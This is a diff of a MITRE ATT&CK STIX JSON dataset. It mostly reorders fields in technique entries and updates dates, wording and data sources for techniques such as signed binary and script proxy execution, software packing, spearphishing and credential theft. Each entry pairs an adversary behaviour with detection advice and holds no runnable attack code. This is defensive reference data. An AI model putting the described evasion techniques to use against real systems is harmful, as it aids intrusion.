- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.0"
},
{
"object_marking_refs": [
@@ -24361,20 +25255,20 @@
],
"modified": "2020-03-30T13:56:55.356Z",
"created": "2017-05-31T21:30:46.047Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_system_requirements": [
- "Shared webroot directory on remote system"
- ],
- "x_mitre_detection": "Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use process monitoring to identify normal processes that run on the Web server and detect processes that are not typically executed.",
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring"
],
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_detection": "Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use process monitoring to identify normal processes that run on the Web server and detect processes that are not typically executed.",
+ "x_mitre_system_requirements": [
+ "Shared webroot directory on remote system"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"external_references": [
@@ -24405,21 +25299,21 @@
],
"modified": "2020-03-24T16:41:00.821Z",
"created": "2020-02-14T13:35:32.938Z",
- "x_mitre_platforms": [
- "Windows",
- "Office 365"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
+ "x_mitre_detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n",
"x_mitre_data_sources": [
"Office 365 audit logs",
"Authentication logs",
"Application logs"
],
- "x_mitre_detection": "The user access logging within Microsoft's SharePoint can be configured to report access to certain pages and documents. (Citation: Microsoft SharePoint Logging). As information repositories generally have a considerably large user base, detection of malicious use can be non-trivial. At minimum, access to information repositories performed by privileged users (for example, Active Directory Domain, Enterprise, or Schema Administrators) should be closely monitored and alerted upon, as these types of accounts should not generally used to access information repositories. If the capability exists, it may be of value to monitor and alert on users that are retrieving and viewing a large number of documents and pages; this behavior may be indicative of programmatic means being used to retrieve all data within the repository. In environments with high-maturity, it may be possible to leverage User-Behavioral Analytics (UBA) platforms to detect and alert on user based anomalies. \n\n"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Windows",
+ "Office 365"
+ ]
},
{
"external_references": [
@@ -24474,24 +25368,24 @@
],
"modified": "2020-03-25T17:21:27.487Z",
"created": "2020-01-24T19:00:32.917Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_contributors": [
- "Travis Smith, Tripwire"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "Administrator",
+ "User"
],
+ "x_mitre_detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Since a shortcut's target path likely will not change, modifications to shortcut files that do not correlate with known software changes, patches, removal, etc., may be suspicious. Analysis should attempt to relate shortcut file change or creation events to other potentially suspicious events based on known adversary behavior such as process launches of unknown executables that make network connections.",
- "x_mitre_permissions_required": [
- "Administrator",
- "User"
+ "x_mitre_contributors": [
+ "Travis Smith, Tripwire"
],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "attack-pattern--457c7820-d331-465a-915e-42f85500ccc4",
@@ -24515,9 +25409,27 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T17:19:19.724Z",
+ "modified": "2020-06-20T22:39:02.045Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "2.1",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\n\nMonitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.",
+ "x_mitre_defense_bypassed": [
+ "Anti-virus",
+ "Application control",
+ "Digital Certificate Validation"
+ ],
+ "x_mitre_contributors": [
+ "Nishan Maharjan, @loki248",
+ "Hans Christoffer Gaardl\u00f8s",
+ "Praetorian"
+ ],
"x_mitre_data_sources": [
"API monitoring",
"File monitoring",
@@ -24529,32 +25441,13 @@
"Process monitoring",
"Process command-line parameters"
],
- "x_mitre_contributors": [
- "Nishan Maharjan, @loki248",
- "Hans Christoffer Gaardl\u00f8s",
- "Praetorian"
- ],
- "x_mitre_defense_bypassed": [
- "Anti-virus",
- "Process whitelisting",
- "Application whitelisting",
- "Digital Certificate Validation"
- ],
- "x_mitre_detection": "Monitor processes and command-line parameters for signed binaries that may be used to proxy execution of malicious files. Compare recent invocations of signed binaries that may be used to proxy execution with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Legitimate programs used in suspicious ways, like msiexec.exe downloading an MSI file from the Internet, may be indicative of an intrusion. Correlate activity with other suspicious behavior to reduce false positives that may be due to normal benign use by users and administrators.\n\nMonitor for file activity (creations, downloads, modifications, etc.), especially for file types that are not typical within an environment and may be indicative of adversary activity.",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "2.1"
},
{
"id": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Signed Script Proxy Execution",
- "description": "Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application whitelisting and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)",
+ "description": "Adversaries may use scripts signed with trusted certificates to proxy execution of malicious files. Several Microsoft signed scripts that are default on Windows installations can be used to proxy execution of other files. This behavior may be abused by adversaries to execute malicious files that could bypass application control and signature validation on systems.(Citation: GitHub Ultimate AppLocker Bypass List)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -24577,28 +25470,28 @@
"phase_name": "defense-evasion"
}
],
- "modified": "2020-03-29T19:39:37.336Z",
+ "modified": "2020-06-20T22:39:47.559Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_data_sources": [
- "Process monitoring",
- "Process command-line parameters"
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
+ "x_mitre_defense_bypassed": [
+ "Application control",
+ "Digital Certificate Validation"
],
"x_mitre_contributors": [
"Praetorian"
],
- "x_mitre_defense_bypassed": [
- "Application whitelisting",
- "Digital Certificate Validation"
+ "x_mitre_data_sources": [
+ "Process monitoring",
+ "Process command-line parameters"
],
- "x_mitre_detection": "Monitor script processes, such as `cscript`, and command-line parameters for scripts like PubPrn.vbs that may be used to proxy execution of malicious files.",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": false
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -24639,18 +25532,18 @@
],
"modified": "2020-03-25T21:46:46.831Z",
"created": "2020-02-11T19:14:48.309Z",
- "x_mitre_platforms": [
- "Windows"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
- "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.",
- "x_mitre_permissions_required": [
- "User"
- ],
"x_mitre_data_sources": [
"Authentication logs",
"Windows event logs"
+ ],
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_detection": "Monitor for anomalous Kerberos activity, such as malformed or blank fields in Windows logon/logoff events (Event ID 4624, 4634, 4672).(Citation: ADSecurity Detecting Forged Tickets) \n\nMonitor for unexpected processes interacting with lsass.exe.(Citation: Medium Detecting Attempts to Steal Passwords from Memory) Common credential dumpers such as Mimikatz access the LSA Subsystem Service (LSASS) process by opening the process, locating the LSA secrets key, and decrypting the sections in memory where credential details, including Kerberos tickets, are stored.",
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -24681,21 +25574,8 @@
],
"modified": "2020-02-21T16:31:32.789Z",
"created": "2017-05-31T21:30:57.201Z",
- "x_mitre_contributors": [
- "Shane Tully, @securitygypsy"
- ],
- "x_mitre_remote_support": true,
- "x_mitre_permissions_required": [
- "User",
- "Administrator",
- "SYSTEM"
- ],
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_detection": "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. \n\nOften these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.\n\nPerform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "2.0",
"x_mitre_data_sources": [
"Authentication logs",
"File monitoring",
@@ -24705,8 +25585,21 @@
"Process use of network",
"Binary file metadata"
],
- "x_mitre_version": "2.0",
- "x_mitre_is_subtechnique": false
+ "x_mitre_detection": "Detection methods will vary depending on the type of third-party software or system and how it is typically used. \n\nThe same investigation process can be applied here as with other potentially malicious activities where the distribution vector is initially unknown but the resulting activity follows a discernible pattern. Analyze the process execution trees, historical activities from the third-party application (such as what types of files are usually pushed), and the resulting activities or events from the file/binary/script pushed to systems. \n\nOften these third-party applications will have logs of their own that can be collected and correlated with other data from the environment. Ensure that third-party application logs are on-boarded to the enterprise logging system and the logs are regularly reviewed. Audit software deployment logs and look for suspicious or unauthorized activity. A system not typically used to push software to clients that suddenly is used for such a task outside of a known admin function may be suspicious. Monitor account login activity on these applications to detect suspicious/abnormal usage.\n\nPerform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ],
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator",
+ "SYSTEM"
+ ],
+ "x_mitre_remote_support": true,
+ "x_mitre_contributors": [
+ "Shane Tully, @securitygypsy"
+ ]
},
{
"external_references": [
@@ -24721,7 +25614,7 @@
],
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Software Discovery",
- "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).",
+ "description": "Adversaries may attempt to get a listing of software and software versions that are installed on a system or in a cloud environment. Adversaries may use the information from [Software Discovery](https://attack.mitre.org/techniques/T1518) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n\nAdversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable to [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).",
"id": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
"type": "attack-pattern",
"kill_chain_phases": [
@@ -24730,8 +25623,23 @@
"phase_name": "discovery"
}
],
- "modified": "2020-03-26T18:56:04.855Z",
+ "modified": "2020-06-29T19:34:39.136Z",
"created": "2019-09-16T17:52:44.147Z",
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_version": "1.1",
+ "x_mitre_permissions_required": [
+ "User",
+ "Administrator"
+ ],
+ "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+ "x_mitre_data_sources": [
+ "Stackdriver logs",
+ "Azure activity logs",
+ "AWS CloudTrail logs",
+ "Process command-line parameters",
+ "Process monitoring",
+ "File monitoring"
+ ],
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -24742,19 +25650,7 @@
"Office 365",
"Azure AD",
"SaaS"
- ],
- "x_mitre_data_sources": [
- "Process command-line parameters",
- "Process monitoring",
- "File monitoring"
- ],
- "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as lateral movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
- "x_mitre_permissions_required": [
- "User",
- "Administrator"
- ],
- "x_mitre_version": "1.1",
- "x_mitre_is_subtechnique": false
+ ]
},
{
"id": "attack-pattern--6ff403bc-93e3-48be-8687-e102fdba8c88",
@@ -24787,13 +25683,6 @@
"created": "2017-05-31T21:30:43.472Z"
},
{
- "id": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
- "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses. ",
- "name": "Software Packing",
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -24816,6 +25705,13 @@
"source_name": "Wikipedia Exe Compression"
}
],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Software Packing",
+ "description": "Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) \n\nUtilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, (Citation: Wikipedia Exe Compression) but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses. ",
+ "id": "attack-pattern--deb98323-e13f-4b0c-8d94-175379069062",
"type": "attack-pattern",
"kill_chain_phases": [
{
@@ -24873,23 +25769,23 @@
],
"modified": "2020-03-30T13:40:14.512Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "2.0",
+ "x_mitre_deprecated": true,
+ "x_mitre_is_subtechnique": false,
+ "x_mitre_remote_support": false,
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
+ ],
+ "x_mitre_detection": "Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring.",
"x_mitre_data_sources": [
"Process monitoring",
"File monitoring",
"Process command-line parameters"
],
- "x_mitre_detection": "Monitor for command shell execution of source and subsequent processes that are started as a result of being executed by a source command. Adversaries must also drop a file to disk in order to execute it with source, and these files can also detected by file monitoring.",
- "x_mitre_platforms": [
- "Linux",
- "macOS"
- ],
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_remote_support": false,
- "x_mitre_is_subtechnique": false,
- "x_mitre_deprecated": true
+ "x_mitre_version": "2.0"
},
{
"id": "attack-pattern--e2907cea-4b43-4ed7-a570-0fdf0fbeea00",
@@ -24950,23 +25846,23 @@
],
"modified": "2020-03-29T20:26:01.690Z",
"created": "2020-02-10T20:47:10.082Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.",
- "x_mitre_data_sources": [
- "File monitoring",
- "Process monitoring"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS"
],
"x_mitre_contributors": [
"Erye Hernandez, Palo Alto Networks"
],
- "x_mitre_platforms": [
- "Linux",
- "macOS"
- ]
+ "x_mitre_data_sources": [
+ "File monitoring",
+ "Process monitoring"
+ ],
+ "x_mitre_detection": "It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious.",
+ "x_mitre_permissions_required": [
+ "User"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--6aac77c4-eaf2-4366-8c13-ce50ab951f38",
@@ -25017,11 +25913,9 @@
],
"modified": "2020-03-27T23:56:40.369Z",
"created": "2020-03-02T19:05:18.137Z",
- "x_mitre_platforms": [
- "macOS",
- "Windows",
- "Linux"
- ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.",
"x_mitre_data_sources": [
"File monitoring",
"Packet capture",
@@ -25030,9 +25924,11 @@
"Email gateway",
"Mail server"
],
- "x_mitre_detection": "Network intrusion detection systems and email gateways can be used to detect spearphishing with malicious attachments in transit. Detonation chambers may also be used to identify malicious attachments. Solutions can be signature and behavior based, but adversaries may construct attachments in a way to avoid these systems.\n\nAnti-virus can potentially detect malicious documents and attachments as they're scanned to be stored on the email server or on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the attachment is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "macOS",
+ "Windows",
+ "Linux"
+ ]
},
{
"id": "attack-pattern--20138b9d-1aac-4a26-8654-a36b6bbf2bba",
@@ -25060,6 +25956,22 @@
"created": "2018-04-18T17:59:24.739Z"
},
{
+ "created": "2020-03-02T19:15:44.182Z",
+ "modified": "2020-03-02T19:44:47.843Z",
+ "kill_chain_phases": [
+ {
+ "kill_chain_name": "mitre-attack",
+ "phase_name": "initial-access"
+ }
+ ],
+ "type": "attack-pattern",
+ "id": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
+ "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)",
+ "name": "Spearphishing Link",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
"external_references": [
{
"source_name": "mitre-attack",
@@ -25077,22 +25989,6 @@
"description": "Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019."
}
],
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "name": "Spearphishing Link",
- "description": "Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments. \n\nAll forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging [User Execution](https://attack.mitre.org/techniques/T1204). The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s, like OAuth tokens, in order to gain access to protected applications and information.(Citation: Trend Micro Pawn Storm OAuth 2017)",
- "id": "attack-pattern--2b742742-28c3-4e1b-bab7-8350d6300fa7",
- "type": "attack-pattern",
- "kill_chain_phases": [
- {
- "kill_chain_name": "mitre-attack",
- "phase_name": "initial-access"
- }
- ],
- "modified": "2020-03-02T19:44:47.843Z",
- "created": "2020-03-02T19:15:44.182Z",
"x_mitre_platforms": [
"Linux",
"macOS",
@@ -25168,18 +26064,18 @@
],
"modified": "2020-03-28T00:04:46.264Z",
"created": "2020-03-02T19:24:00.951Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
- ],
- "x_mitre_detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.",
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0",
"x_mitre_data_sources": [
"SSL/TLS inspection",
"Anti-virus",
"Web proxy"
+ ],
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_detection": "Because most common third-party services used for spearphishing via service leverage TLS encryption, SSL/TLS inspection is generally required to detect the initial communication/delivery. With SSL/TLS inspection intrusion detection signatures or other security gateway appliances may be able to detect malware. \n\nAnti-virus can potentially detect malicious documents and files that are downloaded on the user's computer. Endpoint sensing or network sensing can potentially detect malicious events once the file is opened (such as a Microsoft Word document or PDF reaching out to the internet or spawning Powershell.exe) for techniques such as [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203) or usage of malicious scripts.",
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
]
},
{
@@ -25256,23 +26152,23 @@
],
"modified": "2020-03-14T23:36:52.095Z",
"created": "2020-03-14T23:36:52.095Z",
- "x_mitre_platforms": [
- "Linux",
- "macOS",
- "Windows"
+ "x_mitre_version": "1.0",
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_permissions_required": [
+ "User"
],
+ "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
"x_mitre_data_sources": [
"Packet capture",
"Process use of network",
"Process monitoring",
"Network protocol analysis"
],
- "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)",
- "x_mitre_permissions_required": [
- "User"
- ],
- "x_mitre_is_subtechnique": true,
- "x_mitre_version": "1.0"
+ "x_mitre_platforms": [
+ "Linux",
+ "macOS",
+ "Windows"
+ ]
},
{
"external_references": [
@@ -25337,19 +26233,19 @@
],
"modified": "2020-03-24T23:47:39.124Z",
"created": "2020-01-15T18:00:33.603Z",
- "x_mitre_version": "1.0",
- "x_mitre_is_subtechnique": true,
- "x_mitre_permissions_required": [
- "Administrator"
+ "x_mitre_platforms": [
+ "macOS"
],
- "x_mitre_detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.\n\nMonitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.",
"x_mitre_data_sources": [
"File monitoring",
"Process monitoring"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.\n\nMonitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.",
+ "x_mitre_permissions_required": [
+ "Administrator"
+ ],
+ "x_mitre_is_subtechnique": true,
+ "x_mitre_version": "1.0"
},
{
"id": "attack-pattern--890c9858-598c-401d-a4d5-c67ebcdd703a",
@@ -25408,34 +26304,35 @@
"phase_name": "credential-access"
}
],
- "modified": "2020-03-23T15:59:40.522Z",
+ "modified": "2020-07-14T19:16:30.906Z",
"created": "2019-09-04T15:54:25.684Z",
- "x_mitre_data_sources": [
- "Azure activity logs",
- "OAuth audit logs"
+ "x_mitre_is_subtechnique": false,
